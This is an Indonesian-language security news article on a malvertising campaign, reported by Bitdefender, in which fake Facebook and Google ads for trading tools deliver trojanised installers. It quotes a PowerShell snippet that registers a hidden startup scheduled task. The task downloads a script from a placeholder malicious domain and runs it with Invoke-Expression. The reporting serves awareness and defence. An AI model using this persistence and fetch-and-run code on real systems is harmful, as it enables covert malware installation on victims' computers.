Beberapa bulan terakhir, tim keamanan siber mengamati tren mengkhawatirkan di mana aktor jahat memanfaatkan saluran iklan Facebook dan Google untuk menyamar sebagai layanan keuangan yang sah.
Baca Juga : Windows Defender Firewall Kena Bug, Hacker Bisa Naikkan Akses Tanpa Izin
Dengan mempromosikan akses gratis atau premium ke platform trading ternama, para pelaku berhasil memancing pengguna yang tidak curiga untuk mengunduh aplikasi yang sudah disusupi trojan.
Taktik rekayasa sosial dalam kampanye ini memanfaatkan merek yang familiar dan tanda terverifikasi, sehingga menimbulkan kesan otentik yang mudah lolos dari pengamatan kasual.
Korban diarahkan melalui penempatan iklan berbayar ke muatan yang disamarkan (obfuscated) dan dirancang untuk menghindari analisis otomatis maupun peninjauan manual.
Infeksi awal umumnya dimulai dari klik pada iklan Facebook yang menjanjikan “akses premium satu tahun gratis” ke alat charting berbayar.
Pengguna diarahkan ke halaman arahan (landing page) yang memuat skrip service worker khusus, seringkali terenkripsi dengan AES-CBC dan dimuat lewat StreamSaver.js untuk menyampaikan installer berbahaya yang dikemas seolah-olah merupakan executable resmi.
Setelah diunduh, loader yang berukuran besar—kadang lebih dari 700 MB—melakukan pemeriksaan anti-sandbox, mencegah eksekusi di lingkungan virtualisasi. Hanya setelah lolos dari pertahanan ini, downloader memulai proses multi-tahapnya.
Analis Bitdefender mencatat bahwa setelah menembus pertahanan awal ini, malware beralih ke saluran komunikasi WebSocket pada port 30000, menggantikan pendekatan berbasis HTTP yang dipakai pada kampanye sebelumnya.
Para pelaku mengenkripsi JavaScript front-end mereka, lalu menerapkan rutinitas deobfuscation saat runtime untuk menyusun payload akhir.
Pendekatan dinamis ini menggagalkan sebagian besar alat analisis statis dan secara signifikan meningkatkan kompleksitas penyelidikan forensik.
Eksekusi yang berhasil memicu pembuatan Scheduled Task persisten bernama EdgeResourcesInstallerV12-issg, yang mengunduh dan mengeksekusi skrip PowerShell lanjutan melalui Invoke-Expression.
Task ini tidak hanya memastikan reinfeksi saat sistem di-restart tetapi juga memodifikasi pengaturan Windows Defender untuk mengecualikan direktori payload-nya.
Cuplikan berikut menggambarkan pendaftaran Scheduled Task tersebut:
$action = New-ScheduledTaskAction -Execute ‘powershell.exe’ -Argument ‘-NoProfile -WindowStyle Hidden -Command “Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)”‘
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName ‘EdgeResourcesInstallerV12-issg’ -Description ‘Windows Edge resources updater’
Mekanisme Infeksi
Mekanisme infeksi berpusat pada komponen downloader canggih yang memanfaatkan API service worker dan kerangka pelacakan web modern untuk menyamarkan operasi berbahaya di balik analitik yang tampak sah.
Dengan mengintegrasikan PostHog untuk pelacakan event serta pixel pihak ketiga seperti Facebook Pixel, Google Ads Conversion Tracking, dan Microsoft Ads Pixel, aplikasi front-end mendapatkan visibilitas terhadap perilaku pengguna.
Telemetri ini memungkinkan operator untuk secara selektif menyajikan konten berbahaya hanya kepada target bernilai tinggi, sementara menampilkan halaman yang tampak jinak kepada pengguna lainnya.
Baca Juga : Browser Chromium di Windows Rentan Disusupi Hacker Lewat Ekstensi
Saat pengguna memulai unduhan, service worker mencegat permintaan, mendekripsi dan deobfuscate payload, lalu men-stream biner melalui StreamSaver.js ke sistem berkas—membypass mekanisme pengamanan unduhan browser tradisional.
Mekanisme pengiriman yang mulus ini, dipadukan dengan rotasi domain dan iklan berbahasa spesifik, memungkinkan penyebaran yang cepat dan luas sekaligus mempertahankan profil yang rendah.
